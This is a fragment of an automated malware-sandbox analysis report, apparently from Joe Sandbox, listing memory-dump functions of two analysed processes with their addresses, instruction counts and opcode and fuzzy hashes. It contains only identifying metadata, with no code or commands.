                                                          Function 00007FFD9B7E0B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9
                                                          • API String ID: 0-3426396564
                                                          • Opcode ID: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                          • Instruction ID: 840223b5753a9fa8845fab0c5bb790e5b6d3337983659d4cb37708303201099b
                                                          • Opcode Fuzzy Hash: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                          • Instruction Fuzzy Hash: 45014927719A6A4BD7416A7DFC905D8BB50EA9613679606BBD184C71A2E140144AC3C0
                                                          Function 00007FFD9B7E0D48 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5Z_H$<N_^
                                                          • API String ID: 0-1760700706
                                                          • Opcode ID: 991253fd245aa9e030e103a7b811dfc5c31966c27481369c46ad1ac5bd4ddd4d
                                                          • Instruction ID: ca0b9ab256de4b72af120e04fdb4dd6d3395dfa04fb7d7bc6aef2ddbb1a61a42
                                                          • Opcode Fuzzy Hash: 991253fd245aa9e030e103a7b811dfc5c31966c27481369c46ad1ac5bd4ddd4d
                                                          • Instruction Fuzzy Hash: B651E471A0DA8D4FE759DF688876BA87BE1FF96700F4501BAD048D72F6DE6828058740
                                                          Function 00007FFD9BBDBAB1 Relevance: 1.8, APIs: 1, Instructions: 257COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1719684406.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9bbd0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID: FullImageNameProcessQuery
                                                          • String ID:
                                                          • API String ID: 3578328331-0
                                                          • Opcode ID: 21fe779003593b008ac2cd52b6303e27b948ae3d2f9afaacea75217556a17044
                                                          • Instruction ID: dd2dd3994943b66edfe6a46c927c67595535215eb8f36ff87cf6ea4e2f9051bc
                                                          • Opcode Fuzzy Hash: 21fe779003593b008ac2cd52b6303e27b948ae3d2f9afaacea75217556a17044
                                                          • Instruction Fuzzy Hash: F971C370608A8C8FDB68DF28C8657F937E1FB59315F04427EE84EC7292CB75A9418B81
                                                          Function 00007FFD9B7E08D0 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 365d0f1f617d2da4a1db72fc1e54c89642e184450283ecbedab52371233cd866
                                                          • Instruction ID: 5683e8967d541d785fb4ace48a93342a7b42f699accf25f73759528248751dba
                                                          • Opcode Fuzzy Hash: 365d0f1f617d2da4a1db72fc1e54c89642e184450283ecbedab52371233cd866
                                                          • Instruction Fuzzy Hash: 20414622F0D6A90EE318F7B860AA6F97B90DF45329B1545FED04ECB1F7DD1868418285
                                                          Function 00007FFD9B7E0960 Relevance: .1, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1ac81b9210fe2b12c87d0552f2628c7f58aefec57c0067dd65139dacb1ad576
                                                          • Instruction ID: 9620ed9da4015c73fbe9de22e57b061b39c64c61fa733efcad64ad95355153ed
                                                          • Opcode Fuzzy Hash: f1ac81b9210fe2b12c87d0552f2628c7f58aefec57c0067dd65139dacb1ad576
                                                          • Instruction Fuzzy Hash: 76316522F0EA591EE368B6B864AB5B977D1DF44326B1501FED40FC71F7CC1CA8018285
                                                          Function 00007FFD9B7E0998 Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ddc21f907ce710d3ca20e421628a1458246eb57c4ab444a6d015fe682e58cba
                                                          • Instruction ID: ca0ab28f87a97bc23d41c19f617886509e8e24ed21f33697061eef0eb87d8d6c
                                                          • Opcode Fuzzy Hash: 3ddc21f907ce710d3ca20e421628a1458246eb57c4ab444a6d015fe682e58cba
                                                          • Instruction Fuzzy Hash: 17313530B1AA4D0FE398FB6894AAAB977D2EF58315B0101BDE40EC72F7DD18A8418241
                                                          Function 00007FFD9B7E0C25 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f0a2d0dc8a378f360e1a284f1658a76b04533a5f325e645e22e8645a62358bf
                                                          • Instruction ID: cd42dcf4a53727eb6eafbbb5d855db9a1bd42e6809ec7ac056b8ca315b504208
                                                          • Opcode Fuzzy Hash: 1f0a2d0dc8a378f360e1a284f1658a76b04533a5f325e645e22e8645a62358bf
                                                          • Instruction Fuzzy Hash: 8E21E131B0D78E8FE721DBA888662ED7BA0EF42314F1646BBC044CB1F2D9382649C751
                                                          Function 00007FFD9B7E2B49 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39a2f84ca8c5f8a9106ca07a5ef6215046f2662beedaf5a2311466d7c495b419
                                                          • Instruction ID: 57f2215e96156a4d50adfab05b44bbd5a8bb234e8189e3540d5efef288d6b2b6
                                                          • Opcode Fuzzy Hash: 39a2f84ca8c5f8a9106ca07a5ef6215046f2662beedaf5a2311466d7c495b419
                                                          • Instruction Fuzzy Hash: 3C114221F0DA4D4FEFA8E6A8847A67832C29F95314F0A42B5E41ED72F2DD1C6E415641
                                                          Function 00007FFD9B7E0F60 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c4cbc679cae87d8f772f72dcea9fe51dec44e602e4b578b62e5e3758147a432
                                                          • Instruction ID: 02c832f7fc13b66b5bb611017d5b1d790bc697ae23203ced54f202f93f0fe09c
                                                          • Opcode Fuzzy Hash: 0c4cbc679cae87d8f772f72dcea9fe51dec44e602e4b578b62e5e3758147a432
                                                          • Instruction Fuzzy Hash: DF21A9B4518AA98ED348EF5888697A93FE4F796369F00016FC01AD2BE5C7B90065CB50
                                                          Function 00007FFD9B7E3291 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8506a4ffd0ba6e4dbae0897acd6887ac828e638ad0f49e0e4421568df281a991
                                                          • Instruction ID: ad22f8a2d92bc8e782ed173eed882b96fbb2a32ffa23aa9bdf63ec556fd90d46
                                                          • Opcode Fuzzy Hash: 8506a4ffd0ba6e4dbae0897acd6887ac828e638ad0f49e0e4421568df281a991
                                                          • Instruction Fuzzy Hash: 22113331B1D70D4FEB79EA689865BB833D1FF94300F1302B9D44EC31B2EE286A458A10
                                                          Function 00007FFD9B7E3251 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8d39362fe95df40f19ee4c4d19ee896f23bb2e04719309a45e84762e3ff86b0
                                                          • Instruction ID: f30f9d47190602b7a584a8460c8c44f53732b0ac37a75385c2057928c63a0d53
                                                          • Opcode Fuzzy Hash: b8d39362fe95df40f19ee4c4d19ee896f23bb2e04719309a45e84762e3ff86b0
                                                          • Instruction Fuzzy Hash: 4311A920B1D70D4BE7B9AB989C65AB97391FF44700F0342B9D44ED32B2EE287A444B40
                                                          Function 00007FFD9B7E4DAF Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8daefac7fb2e54fadad0bea44d60a9e50593fafe59146826fa7c9a417c799308
                                                          • Instruction ID: 07d38dc5df13dfabeb08fc5c519266d895115a69bbf6b678bc4a0827d4223421
                                                          • Opcode Fuzzy Hash: 8daefac7fb2e54fadad0bea44d60a9e50593fafe59146826fa7c9a417c799308
                                                          • Instruction Fuzzy Hash: 70015635A19A1DCFDB58EB54C4A59AD73A1FF58304F024229D04ED72B1CE28AA019B81
                                                          Function 00007FFD9B7E0C40 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0dc48c7104517658fcc5c39be6dc54a10d2c0c2ae18ce5dfbdb2191d31e23a9c
                                                          • Instruction ID: 0a201ce57072ad5dcf284e9658fe5ac619544e65796204b1204b1178ee593182
                                                          • Opcode Fuzzy Hash: 0dc48c7104517658fcc5c39be6dc54a10d2c0c2ae18ce5dfbdb2191d31e23a9c
                                                          • Instruction Fuzzy Hash: 4101AD31A0D78C8FE702DBA498616D97FB0AF42314F0646F7C084DB2B2D5346648CB91
                                                          Function 00007FFD9B7E0C48 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b85e6356c1c19707ae2aa1358818d9c1b43bcd6d95c42edf390d886bad124e01
                                                          • Instruction ID: bb8cf8261a1bbbe09a4a06585f00b8aa1b45a2ab6efd29b49439de4def0b7260
                                                          • Opcode Fuzzy Hash: b85e6356c1c19707ae2aa1358818d9c1b43bcd6d95c42edf390d886bad124e01
                                                          • Instruction Fuzzy Hash: E1019E31A0D38C8FD702DBA4C8505D97FB0AF42314F1646E6C044DB2B2D5346648C741
                                                          Function 00007FFD9B7E33A2 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 38689cf1cdd09d80372cd8714291fadd158a3459a86064fb0c9f20a4ede5a2b9
                                                          • Instruction ID: 3132ec98c2592df361c452a6bbee35f518e2bf56987d182c1f15f93dbce114d9
                                                          • Opcode Fuzzy Hash: 38689cf1cdd09d80372cd8714291fadd158a3459a86064fb0c9f20a4ede5a2b9
                                                          • Instruction Fuzzy Hash: A5011234A19B1E4AEB69EA54DC657F933A1FF54301F1202B9D44ED31B2EE386B858A10
                                                          Function 00007FFD9B7E0BB5 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                          • Instruction ID: c5b722fd0b5ce49f4d8717a47160a7a770a536aa8fb4c2e50d3d2fe8e7333798
                                                          • Opcode Fuzzy Hash: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                          • Instruction Fuzzy Hash: 7AF0A720B5E64E4BE6506778DCE24587B60EF4A214FC609F2D0488A0B2E54916968301
                                                          Function 00007FFD9B7E0C50 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea2c456202429806690127347e587cda2519642d891889c577dfeec6c06c7d88
                                                          • Instruction ID: 3eb9302a8186b3ad64189c1b4ffce5bb91d64b37e2c1a43a344f1c60212a2da0
                                                          • Opcode Fuzzy Hash: ea2c456202429806690127347e587cda2519642d891889c577dfeec6c06c7d88
                                                          • Instruction Fuzzy Hash: 8501AD30A0E38D8FD702DBB488546DDBFB0AF02304F1546E6C484CB2B6DA386648C741
                                                          Function 00007FFD9B7E0B77 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d1eca6e89c34facb1142ebffe210a87a8074512dd10663598e782b97dedc227
                                                          • Instruction ID: b4f5f1ea2eb83fcd20b59660ac48ada8c401043cc2600bd5da40ff63780af021
                                                          • Opcode Fuzzy Hash: 5d1eca6e89c34facb1142ebffe210a87a8074512dd10663598e782b97dedc227
                                                          • Instruction Fuzzy Hash: AAF0553520EA89CFD780AA38ECA04D4BBA0FF062097561AEAC0C9C7062D2911909C700
                                                          Function 00007FFD9B7E32E5 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6606f0f3d3229838d91832c6105aa247bd03f14a11520150c8360a1e84743d7
                                                          • Instruction ID: cf7966c1168806fb8afca475901b38077a47100744a4b8903ca3fe71b0114f49
                                                          • Opcode Fuzzy Hash: a6606f0f3d3229838d91832c6105aa247bd03f14a11520150c8360a1e84743d7
                                                          • Instruction Fuzzy Hash: 4EF0363070970E4AE679EA94DD65BB93391AF44304F1352B9D94EC31B2ED286B454910
                                                          Function 00007FFD9B7E2BC0 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 20c9c86a1087df77c769049d52bd14afa2077bbd04ce008804549a0d850bb764
                                                          • Instruction ID: 6678f5c4e2c9674b593b3af00e2d3a40fff75198879f9adb66ab1051dc3880d8
                                                          • Opcode Fuzzy Hash: 20c9c86a1087df77c769049d52bd14afa2077bbd04ce008804549a0d850bb764
                                                          • Instruction Fuzzy Hash: 7FE0E521B19A0D4BEEA8E6A8586A67832D2AF94751B064275D40EC72F2DD28AD414600
                                                          Function 00007FFD9B7E3D83 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6dd27f9ac285e05519ad64f90e19559c4832f1e73fa757b975b4380001b664f2
                                                          • Instruction ID: d81b54b20d26ae2123888b6d575d35b1c4d8d0105f0db85405925d27c6a21399
                                                          • Opcode Fuzzy Hash: 6dd27f9ac285e05519ad64f90e19559c4832f1e73fa757b975b4380001b664f2
                                                          • Instruction Fuzzy Hash: 14E0ED24B0961A86F7749588C8717B97264EF94300F1641B8D54ED37F1DD38AF018645
                                                          Function 00007FFD9B7E12B8 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c1a956ba1ac9307f8447a92c83da176a698f361c040b8d855ba7ebe01ddc563
                                                          • Instruction ID: dac6e8097e0a4fae4effec4264b8737f490bdb429cf08655c9d8453b02d51602
                                                          • Opcode Fuzzy Hash: 6c1a956ba1ac9307f8447a92c83da176a698f361c040b8d855ba7ebe01ddc563
                                                          • Instruction Fuzzy Hash: 81C0123061190C8FCA48EB28C894D1473A0FF19304B960094E00ECB2B1D62AECC2CB41
                                                          Function 00007FFD9B7E06AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69da28debb045b62f10a762b9985da3d4e9d1896be205c3be05fe0798d057366
                                                          • Instruction ID: a3b52144987860e89fd28d35ed0c1111437079bd0351d4e0829ff6c6d5ac8edc
                                                          • Opcode Fuzzy Hash: 69da28debb045b62f10a762b9985da3d4e9d1896be205c3be05fe0798d057366
                                                          • Instruction Fuzzy Hash: 14C08C00F0B70F01E83031EE24A30ACB1004FC4B20FD30332C00E800B19D0E23D60156
                                                          Function 00007FFD9B7E0B18 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                          • Instruction ID: 193f701aaf035b037eb645a63aa0e23585a7d68294506c02760aa6a7d98f684a
                                                          • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                          • Instruction Fuzzy Hash: EDC08C309118088FC910E72CC88880072A0FF0D210BC20190E00DCB270F21A9C80C700
                                                          Function 00007FFD9B7E0548 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28e149b6eaec8455acf60dd11d1a90677249e3e03ef4fee0938c6a344fd6fcae
                                                          • Instruction ID: 49e5147393687c79fcf6404598def3f0e853a243842911ed0af206aa9ccd5b0a
                                                          • Opcode Fuzzy Hash: 28e149b6eaec8455acf60dd11d1a90677249e3e03ef4fee0938c6a344fd6fcae
                                                          • Instruction Fuzzy Hash: 76B09220D5770F82DB3832B109A24A47460AF46219FD202B4D408402B5E86E52D58252
                                                          Function 00007FFD9B7E06D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ba15709c7bce199245e9aad1591c37684aff8dc16d5a1c51746c42f582f0d5f
                                                          • Instruction ID: f4bc8e2f4d1523cbfb8e6a50e124e18c14444885ae4a3ab61e2e5709a945155b
                                                          • Opcode Fuzzy Hash: 1ba15709c7bce199245e9aad1591c37684aff8dc16d5a1c51746c42f582f0d5f
                                                          • Instruction Fuzzy Hash: 32B00204E5754F01E86435FA19A706974505F45514FD61670D40D501B5994D16A51257

                                                          Executed Functions

                                                          Function 00007FFD9BA20D48 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5X_H
                                                          • API String ID: 0-3241812158
                                                          • Opcode ID: f6bc76b0fab7adcb06ff271fa4bbe49f813aab2d56517df39e8d0f5c9818ef5b
                                                          • Instruction ID: 1b55d5f0287f974fcbd707f34f54d5f411e92a39a9f67c028958492e0b6fc2e5
                                                          • Opcode Fuzzy Hash: f6bc76b0fab7adcb06ff271fa4bbe49f813aab2d56517df39e8d0f5c9818ef5b
                                                          • Instruction Fuzzy Hash: E891E171A59A8D4FE799DB6888757A97FE1FF66300F0101BED049D72E6CBB91804C740
                                                          Function 00007FFD9BA20E43 Relevance: .2, Instructions: 171COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1a35165a866dd5d1e797f6f9b019a55ef69a1600edec649ae21ee307303e438
                                                          • Instruction ID: 3b039cf2200270168167971e69bd521ee391ecd14a223089a2d988694b80592a
                                                          • Opcode Fuzzy Hash: a1a35165a866dd5d1e797f6f9b019a55ef69a1600edec649ae21ee307303e438
                                                          • Instruction Fuzzy Hash: 0451FF72A5894A8EE398DB5CD875BAA7FE1EB95350F5000BED00EC72D9CBB51401C740
                                                          Function 00007FFD9BA20B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9
                                                          • API String ID: 0-3426396564
                                                          • Opcode ID: 933a58cb65a4514d8ce84d445b76a35b820fb70835e8853343474cb78f21b0e3
                                                          • Instruction ID: d02e9ac508b4e5831e718e82c3568029247a15fbc901562b54f0a15c170e65f7
                                                          • Opcode Fuzzy Hash: 933a58cb65a4514d8ce84d445b76a35b820fb70835e8853343474cb78f21b0e3
                                                          • Instruction Fuzzy Hash: 9CF07D2775A94A4BD7116B7DFC914F87B40FA9723779602F7D044C71A2E292145EC3C1
                                                          Function 00007FFD9BE1D967 Relevance: 1.9, Instructions: 1892COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
